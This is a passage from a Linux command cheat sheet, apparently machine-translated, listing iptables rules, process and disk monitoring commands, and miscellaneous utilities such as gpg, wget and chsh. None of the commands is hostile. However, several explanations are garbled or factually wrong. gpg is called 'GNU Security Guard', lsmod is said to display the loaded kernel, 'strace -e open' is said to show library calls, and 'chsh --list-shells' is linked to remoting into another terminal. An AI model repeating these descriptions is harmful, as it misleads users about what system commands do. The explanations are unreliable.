8. iptables -t filter -A FORWARD -p tcp –dport pop3 -j ACCEPT: allow POP connections to a front chain.
9. iptables -t filter -A INPUT -j LOG –log-prefix “DROP INPUT”: registering an input string.
10. iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE: configure a PAT (Port Address Translation) on eth0, hiding the forced departure packages.
11. iptables -t nat -A PREROUTING -d 192.168.0.1 -p tcp -m tcp –dport 22 -j DNAT –to-destination 10.0.0.2:22: redirect packets directed from one host to another.

Monitoring and debugging

1. top: show cpu processes.
2. ps -eafw: show cpu processes.
3. ps -e -o pid,args –forest: shows Linux processes in a hierarchal manner.
4. pstree: show system processes tree.
5. kill -9 ID_Process: force close and finish process..
6. kill -1 ID_Process: force a process to reload the configuration.
7. lsof -p $$: display a list of files opened by processes.
8. lsof /home/user1: lists open files on a given path by the system.
9. strace -c ls >/dev/null: show system calls made ​​and received by a process.
10. strace -f -e open ls >/dev/null: display library calls.
11. watch -n1 ‘cat /proc/interrupts’: show interruptions in real time.
12. last reboot: show reboot history.
13. lsmod: display the loaded kernel.
14. free -m: Displays the status of RAM in megabytes.
15. smartctl -A /dev/hda: monitor the reliability of a hard drive via SMART.
16. smartctl -i /dev/hda: check if SMART is enabled on a hard disk.
17. tail /var/log/dmesg: show events inherent in the charging process of the kernel.
18. tail /var/log/messages: show system events.

Other useful commands

1. apropos …keyword: display a list of commands that belong to the keywords of a program, are useful when you know what makes your program, but not know the command name.
2. man ping: display manual pages on-line, for example, in a ping command, use the ‘-k’ to find any related command.
3. whatis …keyword: Displays the description of what the program does.
4. mkbootdisk –device /dev/fd0 `uname -r`: create a floppy boteable.
5. gpg -c file1: encrypt a file with GNU security guard.
6. gpg file1.gpg: decode a file with GNU Security Guard.
7. wget -r http://www.example.com: download an entire website.
8. wget -c http://www.example.com/file.iso: download a file with the possibility to stop the download and resume later.
9. echo ‘wget -c http://www.example.com/files.iso‘ | at 09:00: Start a download at any time. In this case begin at 9 am.
10. ldd /usr/bin/ssh: display the shared libraries required by ssh.
11. alias hh=’history’: place an alias for a command-hh = history.
12. chsh: change the command Shell.
13. chsh –list-shells: is an appropriate command to find out if you have to remote into another terminal.
14. who -a: show who is registered, and print time of last import system, dead processes, system logging processes, active processes produced by init, current and past performance of the system clock changes.